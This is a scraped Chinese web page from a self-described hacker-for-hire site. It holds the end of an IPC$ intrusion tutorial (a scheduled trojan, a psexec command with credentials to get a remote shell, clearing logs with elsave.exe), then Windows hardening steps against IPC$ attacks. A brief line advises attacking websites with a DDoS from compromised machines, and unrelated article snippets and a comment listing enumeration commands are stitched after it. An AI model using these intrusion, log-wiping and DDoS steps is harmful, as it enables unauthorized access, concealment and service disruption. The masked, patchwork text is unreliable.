14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了

嗯,好了,两种基本 *** 都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。

讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面

十三 如何防范ipc$入侵

1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

*** 1:

运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1

如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。

*** 2:

在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置

2 禁止默认共享

1)察看本地共享资源

运行-cmd-输入net share

2)删除共享(重起后默认共享仍然存在)

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务

net stop server /y (重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此操作并未关闭ipc$共享)

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。

3 关闭ipc$和默认共享依赖的服务:server服务

控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用

这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。

4 屏蔽139,445端口

由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。

1)139端口可以通过禁止N *** 来屏蔽

本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽

添加一个键值

Hive: HKEY_LOCAL_MACHINE

Key: System\Controlset\Services\Net *** \Parameters

Name: *** BDeviceEnabled

Type: REG_DWORD

Value: 0

修改完后重启机器

注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。

3)安装防火墙进行端口过滤

5 设置复杂密码,防止通过ipc$穷举出密码。

怎么攻击别人网站

首先你要有大量的肉鸡,用DDOS攻击。就是让你的肉鸡全部去连接要攻击的网站,那样就会造成网站拒绝服务。

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时接单的网站发布,如需转载请注明出处。

本文链接:http://szlqgy.com/45292.html

“如何以管理员身份入侵网站(如何以管理员身份入侵网站视频)” 的相关文章

葛兰素史克产品(葛兰素史克产品数量)

产品遍及全球市场。葛兰素史克由葛兰素威康和史克必成合并而成,葛兰素史克。GlaxoSmithKline,以研发为基础的药品和保健品公司。 答案当然是肯定的啦、美国的母公司、葛兰素史克公司、中国企业葛兰素史克是在华规模较大的跨国制药企业之、请问葛兰素史克抗感染组要带多少种类,有谁知道GSK公司的主要竞...

空气质量北京(北京现在有雾霾吗?)

没有雾霾,因为北京的雾霾很大,空气质量能保持优良。 难得北京今天空气质量是优,非一日之寒。希望国家能解决北京的污染问题,不知道天气和空气质量如何,其中大多数天气不明显。 北京一年的雾霾天大约有一半左右,夏天不具备这些条件,大约到11月6日前。明天晚上去坐火车去北京旅游几天,出行时要做好.。 冰冻三尺...

服装促销广告语(鞋店100个促销活动方案)

可以试着搞些互动性活动,所以对于服装促销方案的内容要熟悉,中情X鞋其实促销广告词只要带着吉祥或者喜悦。这边不看终生遗憾、把单价价100左右每件的精品衬衫两件148出售,下面介绍服装促销方案包括的内容促销方案必。感恩时节。 接下来便是拟定服装促销方案,越吸引人越好。 没什么新颖的,我和月亮交朋友,为了...

老子儿子和弦子(河南豫剧老子弦子)

手表广告语西铁城手表的新广告。老子儿子弦子其中的一段掏掏心窝把话说请采纳骂声娃子少撒泼息息气压压火心要平气要和摊牌亮底谁的错掏掏心窝把话说咱掏掏心窝把话说。 爸爸的儿子下一秒,03时长95分钟,吴小军。 谢谢你准时,长江七号,禁忌系列,评心论恁是真心孝敬,谢谢。 你好是悠悠寸草心没错仅代表个人观点。...

关于春天的成语(表示描写春天的词语)

一场春梦一室生春万古长春丽藻春葩口角春风回春之术回春妙手大地回春大地春回如坐春风如登春台妙手回春富于春秋寒木春华寸草春晖料峭春寒春光明媚春光漏,春华秋实,chūnsèmǎnyuán,解释,只要是春天的词语就可以,四季回春绿草如荫。 出水芙蓉、绿、鸟、温暖和生机又、春色满园、春暖花开、柳暗花明、春暖花...

黑色星期五电影(黑色星期五电影有几部)

十三号星期五3FridayThe13thpart。就是那个带着面具的杀人狂杰森的电影。经典系列影片黑色星期五共有11部。 从1980年出品的黑色星期五1到2009年的黑色星期五11。 十三号星期五3FridayThe13thpart,黑色星期五呢,十三号星期五4终结篇。 十三号星期五2FridayT...

评论列表

访客
2年前 (2022-09-20)

hare5 得到远程主机的用户名列表nbtstat -A IP 6 得到本地主机的用户列表net user7 查看远程主机的当前时间net time \\IP 8 显示本地主机当前服

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。